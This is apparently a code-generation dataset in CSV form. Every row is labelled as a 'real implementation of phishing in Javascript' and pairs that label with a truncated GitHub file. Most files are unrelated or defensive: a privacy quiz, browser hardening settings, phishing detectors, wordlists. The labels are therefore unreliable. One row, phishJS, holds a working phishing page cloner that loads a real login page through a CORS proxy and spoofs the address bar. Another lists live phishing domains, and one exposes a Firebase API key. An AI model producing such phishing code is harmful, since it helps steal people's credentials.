task,problem_title,problem_description,sample_solution,language,repo_name,timestamp,split
code_generation,phishing in Javascript,Real implementation of phishing in Javascript fetched from GitHub.,"/* Author: Selvahini Kamalarajan
Date: December 5, 2023
File Name: script
Description: Informational website about the implications of privacy and information technology usage */
function phishing() {
// Function to display correct answer for phishing email question
var question = document.quiz2.question.value;
if (question == ""yes"") {
document.getElementById(""message"").innerHTML = ""Correct! This is a spoof email coming from a fake sender address (i.e. 'myuniversity.edu') and redirects the user to a bogus page that appears to be legitimate."";
}
if (question == ""no"") {
document.getElementById(""message"").innerHTML = ""Incorrect. This is a spoof email coming from a fake sender address (i.e. 'myuniversity.edu') and redirects the user to a bogus page that appears to be legitimate. Your privacy can be compromised due to malicious script activities."";
}
document.getElementById(""after_submit"").style.visibility = ""visible""; //Set element visibility to visible
}
function check() {
// Function to check answers for Privacy Policy Question
var question = document.quiz.question.value;
// Output message and picture if user answers yes/no
if (question == ""yes"") {
document.getElementById(""message"").innerHTML = ""Nice! You are one of 9% of people who read privacy policies often."";
document.getElementById(""picture"").src = ""policy.png"";
}
if (question == ""no"") {
document.getElementById(""message"").innerHTML = ""Just like you, 91% of consumers accept the terms and conditions without reading them."";
document.getElementById(""picture"").src = ""policies-stats.jpg"";
}
document.getElementById(""after_submit"").style.visibility = ""visible"";
}
function checkAns() {
// Function to check answers for quiz
var correctAns = [""b"", ""b"", ""a"", ""d"", ""b"", ""d"", ""b"", ""b"", ""c"", ""d""];
var correct = 0;
var questions = [document.quiz.q1.value, document.quiz.q2.value, document.quiz.q3.value, documen",Javascript,selvxhini-10/PersonalPrivacyWebsite,2025-05-22T22:01:00.115247,training
code_generation,phishing in Javascript,Real implementation of phishing in Javascript fetched from GitHub.,"//
/******************************************************************************
* user.js *
* https://github.com/pyllyukko/user.js *
******************************************************************************/
/******************************************************************************
* SECTION: HTML5 / APIs / DOM *
******************************************************************************/
// PREF: Disable Service Workers
// https://developer.mozilla.org/en-US/docs/Web/API/Worker
// https://developer.mozilla.org/en-US/docs/Web/API/ServiceWorker_API
// https://wiki.mozilla.org/Firefox/Push_Notifications#Service_Workers
// NOTICE: Disabling ServiceWorkers breaks functionality on some sites (Google Street View...)
// NOTICE: Disabling ServiceWorkers breaks Firefox Sync
// Unknown security implications
// CVE-2016-5259, CVE-2016-2812, CVE-2016-1949, CVE-2016-5287 (fixed)
user_pref(""dom.serviceWorkers.enabled"", false);
// PREF: Disable web notifications
// https://support.mozilla.org/en-US/questions/1140439
user_pref(""dom.webnotifications.enabled"", false);
// PREF: Disable DOM timing API
// https://wiki.mozilla.org/Security/Reviews/Firefox/NavigationTimingAPI
// https://www.w3.org/TR/navigation-timing/#privacy
// NOTICE: Disabling DOM timing API breaks item pages in AliExpress (https://github.com/pyllyukko/user.js/issues/561)
user_pref(""dom.enable_performance"", false);
// PREF: Disable resource timing API
// https://www.w3.org/TR/resource-timing/#privacy-security
// NOTICE: Disabling resource timing API breaks some DDoS protection pages (Cloudflare)
user_pref(""dom.enable_resource_timing"", false);
// PREF: Make sure the User Timing API does not provide a new high resolution timestamp
// https://trac.torproject.org/projects/tor/ticket/16336
// https://www.w3.org/TR/2013/REC-user-timing-2",Javascript,pyllyukko/user.js,2025-05-22T22:01:00.249678,training
code_generation,phishing in Javascript,Real implementation of phishing in Javascript fetched from GitHub.,"export class PhishingDetector {
constructor() {
// No need to check for ai.languageModel here
// We'll handle capability checks when we use the model
}
async calculateScore(emailContent) {
try {
// Log emailContent for debugging
console.log('Email content received:', emailContent);
const features = this.analyzeEmailFeatures(emailContent);
// Check if the language model is available
const capabilities = await ai.languageModel.capabilities();
if (capabilities.available !== ""readily"") {
console.warn('Language model is not readily available');
if (capabilities.consent === ""granted"") {
console.log('Consent already granted.');
} else if (capabilities.consent === ""requirable"") {
// Request user consent
const consentResult = await ai.languageModel.requestConsent();
if (!consentResult) {
console.warn('User did not grant consent');
return 50; // Return a default score or handle accordingly
} else {
console.log('User granted consent.');
}
} else {
console.warn('Consent is not available.');
return 50; // Return a default score or handle accordingly
}
}
// Generate the prompt
const prompt = `
Instructions:
- Considering the above information, assign a phishing likelihood score and provide a detailed explanation.
- Use English and Arabic numerals.
- Return the result in the format ""The score is the following: X"", where X is a number between 0 and 100.
Analyze this email for phishing indicators and provide a response in the following format:
The score is the following: X
The explanation is: [Your detailed analysis here]
End of explanation.
Consider these factors:
- Urgency or pressure tactics
- Grammar and spelling errors
- Suspicious links or attachments
- Requests for sensitive information
- Mismatched or fake sender addresses
- Time sent ",Javascript,Dalosuuu/GmailPhishGuardian_AI,2025-05-22T22:01:00.434292,training
code_generation,phishing in Javascript,Real implementation of phishing in Javascript fetched from GitHub.,"'use strict'
const chromeLauncher = require('chrome-launcher')
const path = require('path')
// Borrow from here:
// https://github.com/GoogleChrome/puppeteer/blob/master/lib/Launcher.js#L30
const DEFAULT_ARGS = [
'--disable-background-networking',
'--disable-background-timer-throttling',
'--disable-client-side-phishing-detection',
'--disable-default-apps',
'--disable-hang-monitor',
'--disable-popup-blocking',
'--disable-prompt-on-repost',
'--disable-sync',
'--enable-automation',
'--enable-devtools-experiments',
'--metrics-recording-only',
'--no-first-run',
'--password-store=basic',
'--safebrowsing-disable-auto-update',
'--use-mock-keychain',
]
// borrow from: http://qiita.com/saekis/items/c2b41cd8940923863791
function escapeHtml (string) {
if (typeof string !== 'string') {
return string
}
return string.replace(/[&'`""<>]/g, function (match) {
return {
'&': '&',
'\'': ''',
'`': '`',
'""': '"',
'<': '<',
'>': '>',
}[match]
})
}
function escapeSingleQuote (string) {
if (typeof string !== 'string') {
return string
}
return string.replace(/'/g, '\\\'')
}
function escapeNewLine (string) {
return string.replace(/\r?\n/g, '\\n')
}
async function createChromeLauncher (startingUrl, options) {
const flags = [].concat(DEFAULT_ARGS)
let chromeInstance
// Lighthouse adds '--disable-setuid-sandbox' flag automatically.
// The flag causes an error on linux when staring headless chrome.
// '--no-sandbox' suppresses an error caused by '--disable-setuid-sandbox'.
if (process.platform === 'linux') {
flags.push('--no-sandbox')
}
if (!options.visible) {
flags.push('--headless')
flags.push('--hide-scrollbars')
flags.push('--mute-audio')
}
if (options.chromeFlags && Array.isArray(options.chromeFlags)) {
options.chromeFlags.forEach(f => {
if (f.indexOf('--') === -1) {
throw new Error('An item of chromFlags option",Javascript,OnetapInc/chromy,2025-05-22T22:01:00.573851,training
code_generation,phishing in Javascript,Real implementation of phishing in Javascript fetched from GitHub.,"// eslint-disable-next-line no-undef
docute.init({
debug: true,
title: 'Spam Scanner',
repo: 'spamscanner/spamscanner',
'edit-link': 'https://github.com/spamscanner/spamscanner/tree/master/',
twitter: 'niftylettuce',
nav: {
default: [
{
title:
'The best anti-spam, email filtering, and phishing prevention service.',
path: '/'
}
]
},
// eslint-disable-next-line no-undef
plugins: [docuteEmojify()]
});
",Javascript,spamscanner/spamscanner,2025-05-22T22:01:00.710474,training
code_generation,phishing in Javascript,Real implementation of phishing in Javascript fetched from GitHub.,"
// this is the code which will be injected into a given page...
var config = {
apiKey: ""AIzaSyD1FfiwIWzbbn0rhqQg6ZF2KzVBOiqU7oQ"",
authDomain: ""phish-ai-production.firebaseapp.com"",
databaseURL: ""https://phish-ai-production.firebaseio.com"",
projectId: ""phish-ai-production"",
storageBucket: ""gs://phish-ai-production.appspot.com/"",
messagingSenderId: ""976092427021""
};
firebase.initializeApp(config);
var db = firebase.firestore();
function open_options_page() {
chrome.tabs.create({'url': ""/options.html"" } )
};
function open_demo_page() {
chrome.tabs.create({'url': ""https://www.phish.ai/request-a-demo"" } )
};
function restore_popup() {
chrome.storage.local.get({
idnEnable: true,
aiEnable: true
}, function(items) {
if (!items.aiEnable) {
document.getElementById('zero_day_disabled').style.display = """"
}
if (!items.idnEnable) {
document.getElementById('idn_disabled').style.display = """"
}
var bg = chrome.extension.getBackgroundPage();
var query = {active: true, currentWindow: true};
chrome.tabs.query(query, function callback(tabs) {
if (items.idnEnable) {
var currentTab = tabs[0]; // there will be only one in this array
var hostname = bg.extractHostname(currentTab.url);
var domain = document.getElementById('domain');
var idn_status = document.getElementById('idn_status');
if (bg.isDomainIDN(hostname)) {
domain.className = 'badge badge-danger';
idn_status.className = 'badge badge-danger';
idn_status.innerHTML = 'IDN Detected';
}
domain.innerHTML = hostname;
}
if (items.aiEnable) {
if (currentTab.id in bg.tabMalicious) {
var zero_day = document.getElementById('zero_day');
var ta",Javascript,phishai/phish-protect,2025-05-22T22:01:00.830022,training
code_generation,phishing in Javascript,Real implementation of phishing in Javascript fetched from GitHub.,"respecConfig.localBiblio = {
""aicaptcha"": {
""title"": ""aiCaptcha: Using AI to beat CAPTCHA and post comment spam"",
""date"": """",
""authors"": [""Casey Chesnut""],
""editors"": [],
""etAl"": false,
""publisher"": """",
""href"": ""http://www.brains-n-brawn.com/default.aspx?vDir=aicaptcha""
},
""able-gamers"": {
""title"": ""Thought On Accessibility and VR"",
""date"": ""March, 2017"",
""authors"": [""AJ Ryan""],
""editors"": [],
""etAl"": false,
""publisher"": """",
""href"": ""https://ablegamers.org/thoughts-on-accessibility-and-vr/""
},
""antiphishing"": {
""title"": ""Phishing Activity Trends Report"",
""date"": ""July, 2005"",
""authors"": [],
""editors"": [],
""etAl"": false,
""publisher"": ""Anti-Phishing Working Group"",
""href"": ""http://antiphishing.org/APWG_Phishing_Activity_Report_Jul_05.pdf""
},
""breaking"": {
""title"": ""Breaking CAPTCHAs Without Using OCR"",
""date"": """",
""authors"": [""Howard Yeend""],
""editors"": [],
""etAl"": false,
""publisher"": """",
""href"": ""http://www.cs.berkeley.edu/%7Emori/gimpy/gimpy.html""
},
""breakingocr"": {
""title"": ""Breaking CAPTCHAs Without Using OCR"",
""date"": """",
""authors"": [""Howard Yeend""],
""editors"": [],
""etAl"": false,
""publisher"": """",
""href"": ""http://www.puremango.co.uk/cm_breaking_captcha_115.php""
},
""chafee"": {
""title"": ""17 USC 121, Limitations on exclusive rights: reproduction for blind or other people with disabilities (also known as the Chafee Amendment)"",
""date"": """",
""authors"": [],
""editors"": [],
""etAl"": false,
""publisher"": """",
""href"": ""https://www.copyright.gov/title17/92chap1.html""
},
""captcha-ocr"": {
""title"": ""CAPTCHA: Attacks and Weaknesses against OCR technology"",
""date"": ""2013"",
""authors"": [
""Silky Azad"", ""Kiran Jain""],
""publisher"": ""Journal of Computer science and Technology"",
""etAl"": false,
""editors"": [],
""href"": ""https://computerresearch.org/index.php/computer/article/download/368/368""
},
""information-security"": {
""ti",Javascript,w3c/apa,2025-05-22T22:01:01.006796,training
code_generation,phishing in Javascript,Real implementation of phishing in Javascript fetched from GitHub.,"'use strict';
const fs = require('fs-extra');
const debug = require('debug')('app');
const express = require('express');
const csp = require('express-csp-header');
const frameguard = require('frameguard');
const xssFilter = require('x-xss-protection');
const bodyParser = require('body-parser');
const url = require('url');
const dateFormat = require('dateformat');
const {fork} = require('child_process');
const download = require('download-file');
const rimraf = require('rimraf');
const phishingDetector = require('eth-phishing-detect/src/detector');
const crypto = require(""crypto"");
const request = require('request');
const app = express();
const config = require('./config');
const check = require('./_utils/webcheck.js');
const lookup = require('./_utils/lookup.js');
let default_template = fs.readFileSync('./_layouts/default.html', 'utf8');
let cache;
let updating_now = false;
let icon_warnings = [];
var older_cache_time;
if('perform_dns_lookup' in config && config.perform_dns_lookup === false) {
default_template = default_template.replace(""{{ config.perform_dns_lookup }}"", ""
DNS lookups not performed due to configuration.
"");
} else {
default_template = default_template.replace(""{{ config.perform_dns_lookup }}"", '');
}
/* See if there's an up-to-date cache, otherwise run `update.js` to create one. */
function getCache(callback = false) {
if (!fs.existsSync('_cache/cache.json')) {
debug(""No cache file found. Creating one..."");
if (callback) {
if (!updating_now) {
updating_now = true;
fork('update.js');
}
var checkDone = setInterval(function() {
if (fs.existsSync('_cache/cache.json')) {
updating_now = false;
cache = JSON.parse(fs.readFileSync('_cache/cache.json'));
clearInterval(checkDone);
debug(""Successfully updated cache!"");
",Javascript,MrLuit/EtherScamDB,2025-05-22T22:01:01.099275,training
code_generation,phishing in Javascript,Real implementation of phishing in Javascript fetched from GitHub.,"/**
* Github
* https://github.com/6IX7ine/certstreamcatcher
*
* Copyright (c) 2017 Fábio Castro
* Licensed under the MIT license.
*/
'use strict'
const tld = require('tldjs');
const lodash = require('lodash');
const color = require('cli-color');
const status = require('node-status');
const punycode = require('punycode');
const yellow = color.yellow.underline;
const danger = color.redBright.underline;
const white = color.white.underline;
const certificates = status.addItem('certificates');
const mapping = {
""a"": [""à"", ""á"", ""â"", ""ã"", ""ä"", ""å"", ""ā"", ""ă"", ""ą"", ""ǎ"", ""ȁ"", ""ȃ"", ""ȧ"", ""ḁ"", ""ẚ"", ""ạ""],
""b"": [""ḃ"", ""ḅ"", ""ḇ"", ""ƀ""],
""c"": [""ç"", ""ć"", ""ĉ"", ""ċ"", ""č""],
""d"": [""ḋ"", ""ḍ"", ""ḏ"", ""ḑ"", ""ḓ"", ""đ""],
""e"": [""è"", ""é"", ""ê"", ""ë"", ""ĕ"", ""ė"", ""ę"", ""ě"", ""ȅ"", ""ȇ"", ""ȩ"", ""ḙ"", ""ḛ"", ""ẹ"", ""ẽ""],
""f"": [""ḟ""],
""g"": [""ĝ"", ""ğ"", ""ġ"", ""ģ"", ""ǧ"", ""ǵ"", ""ḡ""],
""h"": [""ĥ"", ""ȟ"", ""ḣ"", ""ḥ"", ""ḧ"", ""ḩ"", ""ḫ"", ""ẖ""],
""i"": [""ì"", ""í"", ""î"", ""ï"", ""ĩ"", ""ī"", ""ĭ"", ""į"", ""ǐ"", ""ȉ"", ""ȋ"", ""ḭ"", ""ị""],
""j"": [""ĵ"", ""ǰ""],
""k"": [""ķ"", ""ǩ"", ""ḱ"", ""ḳ"", ""ḵ""],
""l"": [""ĺ"", ""ļ"", ""ľ"", ""ŀ"", ""ḷ"", ""ḻ"", ""ḽ"", ""ι"", ""ł""],
""m"": [""ḿ"", ""ṁ"", ""ṃ"", ""ϻ""],
""n"": [""ñ"", ""ń"", ""ņ"", ""ň"", ""ʼn"", ""ǹ"", ""ṅ"", ""ṇ"", ""ṉ"", ""ṋ""],
""o"": [""ò"", ""ó"", ""ô"", ""õ"", ""ö"", ""ō"", ""ŏ"", ""ő"", ""ơ"", ""ǒ"", ""ǫ"", ""ố"", ""ȍ"", ""ȏ"", ""ȯ"", ""ọ"", ""ø"", ""ộ""],
""p"": [""ṕ"", ""ṗ"", ""ϸ""],
""r"": [""ŕ"", ""ŗ"", ""ř"", ""ȑ"", ""ȓ"", ""ṙ"", ""ṛ"", ""ṟ"", ""ґ""],
""s"": [""ŝ"", ""ş"", ""š"", ""ș"", ""ṡ"", ""ṣ""],
""t"": [""ţ"", ""ť"", ""ț"", ""ṫ"", ""ṭ"", ""ṯ"", ""ṱ"", ""ẗ""],
""u"": [""ù"", ""ú"", ""û"", ""ü"", ""ũ"", ""ū"", ""ŭ"", ""ů"", ""ű"", ""ų"", ""ư"", ""ǔ"", ""ȕ"", ""ȗ"", ""ṳ"", ""ṵ"", ""ṷ"", ""ụ""],
""v"": [""ṽ"", ""ṿ""],
""w"": [""ŵ"", ""ẁ"", ""ẃ"", ""ẅ"", ""ẇ"", ""ẉ"", ""ẘ""],
""x"": [""ẋ"", ""ẍ""],
""y"": [""ý"", ""ÿ"", ""ŷ"", ""ȳ"", ""ẏ"", ""ẙ"", ""ỳ"", ""ỵ"", ""ỹ""],
""z"": [""ź"", ""ż"", ""ž"", ""ẑ"", ""ẓ"", ""ẕ""]
}
module.exports = {
certstreamClientPhishing: function (certstream, regex, tlds, options) {
this.certstream = certstream;
this.regex = regex;
this.tlds = tlds;
let settings = { tlds: false };
if (!op",Javascript,jimywork/certstreamcatcher,2025-05-22T22:01:01.244357,training
code_generation,phishing in Javascript,Real implementation of phishing in Javascript fetched from GitHub.,"// Redirecting to links from the book:
// https://nooffice.link/REDIRECT
// which translates to https://nooffice.org/redirect?to=REDIRECT
let links = new Map([
//list of REDIRECT links
['nooffice', 'https://nooffice.org'],
//chapter 19
['ocr', 'https://en.wikipedia.org/wiki/Optical_character_recognition'],
['evernote','https://Evernote.com'],
['swiftscan', 'https://swiftscan.app/en/index.html'],
['ios-scan', 'https://support.apple.com/en-us/HT210336'],
['dropbox', 'https://www.dropbox.com'],
['box', 'https://box.com'],
['gdrive', 'https://drive.google.com'],
['onedrive', 'https://www.microsoft.com/en-us/microsoft-365/onedrive/online-cloud-storage'],
['iwork', 'https://www.apple.com/iwork/'],
['gsheets', 'https://www.google.com/sheets/about/'],
['excel', 'https://www.microsoft.com/en-us/microsoft-365/excel'],
['mfa', 'https://en.wikipedia.org/wiki/Multi-factor_authentication'],
['messages', 'https://support.apple.com/explore/messages'],
['signal', 'https://www.signal.org'],
['telegram', 'https://telegram.org'],
['whatsapp', 'https://www.whatsapp.com'],
['ipadonly', 'https://ipadonly.com/book/'],
['vpn', 'https://en.wikipedia.org/wiki/Virtual_private_network'],
['github', 'https://nooffice.org/why-in-any-company-you-should-be-using-version-control-for-anything-how-we-use-github-not-only-bc2554308455/'],
//chapter 20
['conversation', 'https://en.wikipedia.org/wiki/A_Little_Less_Conversation'],
['slack', 'https://slack.com'],
['msteams', 'https://www.microsoft.com/en-us/microsoft-365/microsoft-teams/group-chat-software'],
['cognitive', 'https://www.pnas.org/content/106/37/15583'],
['digital-minimalism', 'https://www.calnewport.com/books/digital-minimalism/'],
//chapter 21
['offices', 'https://sliwinski.com/tag/office'],
['cabinet', 'https://sliwinski.com/declutter-your-desk-why-i-love-my-clutter-fre/'],
['stand', 'https://michael.team/myoffice/'],
['whiteboard', 'https://sliwinski.com/whiteboard/'],
//chapter 22
//chapter 23
['basecamphires', 'https://m.signa",Javascript,Nozbe/NoOffice.org,2025-05-22T22:01:01.359520,training
code_generation,phishing in Javascript,Real implementation of phishing in Javascript fetched from GitHub.,"/* OpenID for node.js
*
* http://ox.no/software/node-openid
* http://github.com/havard/node-openid
*
* Copyright (C) 2010 by Håvard Stranden
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the ""Software""), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in
* all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED ""AS IS"", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
*
* -*- Mode: JS; tab-width: 2; indent-tabs-mode: nil; c-basic-offset: 2 -*-
* vim: set sw=2 ts=2 et tw=80 :
*/
const { access } = require('fs');
var Buffer = require('buffer').Buffer,
crypto = require('crypto'),
http = require('./http'),
querystring = require('querystring'),
url = require('url'),
xrds = require('./lib/xrds');
var _associations = {};
var _discoveries = {};
var _nonces = {};
var AX_MAX_VALUES_COUNT = 1000;
var openid = exports;
var _get = http.get;
var _post = http.post;
function hasOwnProperty(obj, prop) {
return Object.prototype.hasOwnProperty.call(obj, prop);
}
openid.RelyingParty = function (returnUrl, realm, stateless, strict, extensions) {
this.returnUrl = returnUrl;
this.realm = realm || null;
this.stateless = stateless;
this.str",Javascript,havard/node-openid,2025-05-22T22:01:01.483356,training
code_generation,phishing in Javascript,Real implementation of phishing in Javascript fetched from GitHub.,"//If container already in DOM, remove it
if(report.length > 0) report.remove();
//Container report
/*report = $('\
\
');*/
body.append('
');
report = cacheSel('#report');
//Container, select subject / textarea
report.html('Selectionner le sujet de votre signalement
\
\
- Liens morts
\
- Hors charte
\
- A déplacer
\
- Virus/Trojan/Scam...
\
- Insulte envers un peuple/religion/minorité...
\
- Violation vie privée
\
- Contenu pédophile
\
- Réouverture, résolu, autres...
\
\
');
//Refresh caching
report = cacheSel('#report');
reportv = cacheSel('#reportv');
//Hide the reportv until a subject get select
reportv.hide();
//Get 80% in px
var sizecal = $(window).width() * 0.8;
//Max width
if(parseInt(sizecal) > 600) var sizecal = 600;
//Pop the container vote
report.dialog({
width:sizecal,
modal:true,
resizable: true,
title:'Signalement',
dialogClass:'modalNinja',
show:{effect:'scale', duration: 320},
buttons: [{
text: 'Confirmation',
click: function() {
//Subject
reps = reportv.attr('class');
//Value textarea
rept = reportv.val();
//Less 10 chars return
if(rept.length < 10) {
coloredInput(reportv,'errorSe','Minimum 10 caractères');
return;
",Javascript,Anyon3/ninjacms,2025-05-22T22:01:01.680023,training
code_generation,phishing in Javascript,Real implementation of phishing in Javascript fetched from GitHub.,"/**
* Created by IntelliJ IDEA.
* User: Altryne
* Date: Nov 20, 2010
* Time: 4:55:41 AM
* To change this template use File | Settings | File Templates.
*/
var intervall = 0;
can_run_apps = false,
folder_open = false,
tick = '',
doubleclickthreshhold = 200,
isDblClick = false,
canScroll = true,
active_app = '';
$('.page .delete,#dock .delete').live('click', function(event) {
event.stopPropagation();
event.stopImmediatePropagation();
if(confirm('Are you sure you want to delete this app from you iPad?')){
$(this).parent().css({'width':74,'height':99}).children('.delete, span').hide();
$(this).siblings('.app_logo')
.stop()
.css('position','absolute')
.animate({left:""50%"",width:1,top:""50%"",height: 1},'easeInQuint',function(){$(this).parent().remove()})
}
});
$('#multitask_bar .delete').live('mousedown ', function(event) {
event.stopPropagation();
event.stopImmediatePropagation();
$(this).parent().css({'width':74,'height':99}).children('.delete, span').hide();
$(this).siblings('.app_logo')
.stop()
.css('position','absolute')
.animate({left:""50%"",width:1,top:""50%"",height: 1},'easeInQuint',function(){
_id = $(this).parent().attr('id');
$('#'+_id+'_app').remove();
$(this).parent().remove();
if(!$('#multitask_bar li').length){
closeMultitask(200);
}
})
});
$('.page.apps>li,#dock li').live('mousedown mouseup', function(event) {
if (event.type == 'mousedown') {
$(this).addClass('mousedown');
if (!$('#drag').is('.ui-draggable-dragging') && !$('body').is('.editMode')) {
can_run_apps = true;
intervall = setTimeout(edit_mode, '1000');
}else if($(this).hasClass('folder') && $('body').is('.editMode')){
openFolder($(this).attr('id",Javascript,altryne/Ipad-Simulator,2025-05-22T22:01:01.825080,training
code_generation,phishing in Javascript,Real implementation of phishing in Javascript fetched from GitHub.,"/*
* Copyright (c) 2021, Atheropids. All rights reserved.
*
* THE SOFTWARE IS PROVIDED ""AS IS"", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
* SOFTWARE.
*/
'use strict';
const https = require('https');
const readline = require('readline');
const tough = require('tough-cookie');
// Spec holder class. Please see comments of member variables for details.
class PhishingServer {
constructor(__domain, __entry_path = '/', __login_page = '/home/login', __login_inbox = '/login/dologin') {
// Target C&C server domain name.
this.target_domain = __domain;
// Remote path for server cookie init.
this.entry_path = __entry_path;
// Remote path of the phishing page.
this.phishing_page_path = __login_page;
// Remote path of the phishing data receiver.
this.phishing_target_path = __login_inbox;
}
}
/*
* Settings are here c:
* Modify them on your purpose.
*/
// List of malicious servers.
let spam_targets = [
// [seized operation] new PhishingServer('steamcomrninuty.ru'),
// [seized operation] new PhishingServer('steamcommnunmity.com', '/id/zxayonax'),
// [seized operation] new PhishingServer('nitro-discord.ru', '/airdrop'),
// [seized operation] new PhishingServer('steamcommunity.link'),
// [seized operation] new PhishingServer('discorcl.link'),
new PhishingServer('steamcommmunilty.com', '/tradoffer/new/?partner=406482431&token=lfk938iK'),
new PhishingServer('discorrd.ru'),
new PhishingServer('free-nitroos.ru'),
new PhishingServer('discod.info', '/nitro-gift'),
new PhishingServer('d",Javascript,Atheropids/SteamComrninuty-Phish-Spammer,2025-05-22T22:01:02.005822,training
code_generation,phishing in Javascript,Real implementation of phishing in Javascript fetched from GitHub.,"module.exports = [
'2015',
'2016',
'2017',
'2018',
'2019',
'2020',
'abuse',
'academy',
'accessibility',
'account',
'accountant',
'accounting',
'accountmanager',
'accountmanagers',
'accounts',
'accountspayable',
'acquisition',
'admin',
'admin1',
'administracao',
'administracion',
'administrador',
'administratie',
'administratif',
'administration',
'administrativo',
'administrator',
'administrators',
'admins',
'adminteam',
'admissions',
'adops',
'ads',
'adventure',
'advertise',
'advertising',
'advertisingsales',
'advice',
'advisor',
'advisors',
'adwords',
'affiliate',
'affiliates',
'agence',
'agencia',
'agency',
'agents',
'alarm',
'alarms',
'alert',
'alerts',
'alexa',
'all',
'all-employees',
'all-pms',
'all-staff',
'all-team',
'all-users',
'all.employees',
'all.staff',
'all.users',
'all_staff',
'alla',
'alle',
'allemployees',
'allhands',
'allsales',
'allstaff',
'allstudents',
'allteachers',
'allteam',
'allusers',
'alpha',
'alphas',
'alumni',
'ambassadors',
'amministrazione',
'analysts',
'analytics',
'android',
'angels',
'animation',
'announce',
'announcements',
'ap',
'api',
'app',
'apple',
'application',
'applications',
'apply',
'appointments',
'apps',
'archives',
'asistente',
'asset',
'assistanthead',
'assistencia',
'assistenza',
'associates',
'associates-all',
'ateam',
'atencionalcliente',
'atendimento',
'auctions',
'available',
'backend',
'backend-dev',
'backup',
'bd',
'benefits',
'berlin',
'bestellung',
'beta',
'biblioteca',
'bibliotheque',
'billing',
'bills',
'biuro',
'biz',
'bizdev',
'blog',
'board',
'bod',
'bookclub',
'booking',
'bookings',
'boston',
'boxoffice',
'brand',
'branding',
'brands',
'brandsolutions',
'broadcast',
'buchhaltung',
'bugs',
'build',
'bursar',
'busdev',
'business',",Javascript,decal/werdlists,2025-05-22T22:01:02.114023,training
code_generation,phishing in Javascript,Real implementation of phishing in Javascript fetched from GitHub.,"page_src = ""https://login.vulnwebsite.com/"";
phishing_url=""http://yourphishingdomain.com/"";
function doHTMLMagic(pageSource, baseURL, phishDomain) {
replaceSrc = pageSource.replace('href=""/', ""href=\"""" + baseURL+ '/');
replaceSrc = replaceSrc.replace('src=""/', ""src=\"""" + baseURL+ '/');
replaceSrc = replaceSrc.replace('', '');
return replaceSrc;
}
function createCORSRequest(method, url) {
var xhr = new XMLHttpRequest();
if (""withCredentials"" in xhr) {
xhr.open(method, url, true);
} else if (typeof XDomainRequest != ""undefined"") {
xhr = new XDomainRequest();
xhr.open(method, url);
} else {
xhr = null;
}
return xhr;
}
function makeCorsRequest(baseURL, phishDomain) {
var url = 'https://cors-anywhere.herokuapp.com/' + baseURL;
var xhr = createCORSRequest('GET', url);
if (!xhr) {
return;
}
xhr.onload = function() {
var pageSourceStr = doHTMLMagic(xhr.responseText, baseURL, phishDomain)
document.open();
document.write(pageSourceStr);
document.close();
};
xhr.send();
}
makeCorsRequest(page_src, phishing_url);
window.history.pushState("""", ""Login"", ""/login"");",Javascript,infosec-au/phishJS,2025-05-22T22:01:02.254176,training
code_generation,phishing in Javascript,Real implementation of phishing in Javascript fetched from GitHub.,"const { Builder, By, until, Capabilities } = require(""selenium-webdriver"")
const chrome = require(""selenium-webdriver/chrome"")
const url = require(""url"")
const fs = require(""fs"")
const crypto = require(""crypto"")
const request = require(""request"")
const path = require(""path"")
const FormData = require(""form-data"")
const proxy = require(""selenium-webdriver/proxy"")
const proxyChain = require(""proxy-chain"")
require('console-stamp')(console, {
format: ':date(yyyy/mm/dd HH:MM:ss.l)'
})
require(""dotenv"").config()
const extensionId = ""caacbgbklghmpodbdafajbgdnegacfmo""
const CRX_URL = `https://clients2.google.com/service/update2/crx?response=redirect&prodversion=98.0.4758.102&acceptformat=crx2,crx3&x=id%3D${extensionId}%26uc&nacl_arch=x86-64`
const USER_AGENT =
""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36""
const USER = process.env.APP_USER || """"
const PASSWORD = process.env.APP_PASS || """"
const ALLOW_DEBUG = !!process.env.DEBUG?.length || false
const EXTENSION_FILENAME = ""app.crx""
const PROXY = process.env.PROXY || undefined
console.log(""-> Starting..."")
console.log(""-> User:"", USER)
console.log(""-> Pass:"", PASSWORD)
console.log(""-> Proxy:"", PROXY)
console.log(""-> Debug:"", ALLOW_DEBUG)
if (!USER || !PASSWORD) {
console.error(""Please set APP_USER and APP_PASS env variables"")
process.exit()
}
if (ALLOW_DEBUG) {
console.log(
""-> Debugging is enabled! This will generate a screenshot and console logs on error!""
)
}
async function downloadExtension(extensionId) {
const url = CRX_URL.replace(extensionId, extensionId)
const headers = { ""User-Agent"": USER_AGENT }
console.log(""-> Downloading extension from:"", url)
// if file exists and modify time is less than 1 day, skip download
if (fs.existsSync(EXTENSION_FILENAME) && fs.statSync(EXTENSION_FILENAME).mtime > Date.now() - 86400000) {
console.log(""-> Extension already downloaded! skip download..."")
return
}
return new ",Javascript,web3bothub/gradient-bot,2025-05-22T22:01:02.390815,training
code_generation,phishing in Javascript,Real implementation of phishing in Javascript fetched from GitHub.,"const SCALES = { URGENCY: 5, CONFRIM: 6 };
const TOTALSCALE = 20;
const THRESH = 0.33;
function emailCheck(email) {
let scale = 0;
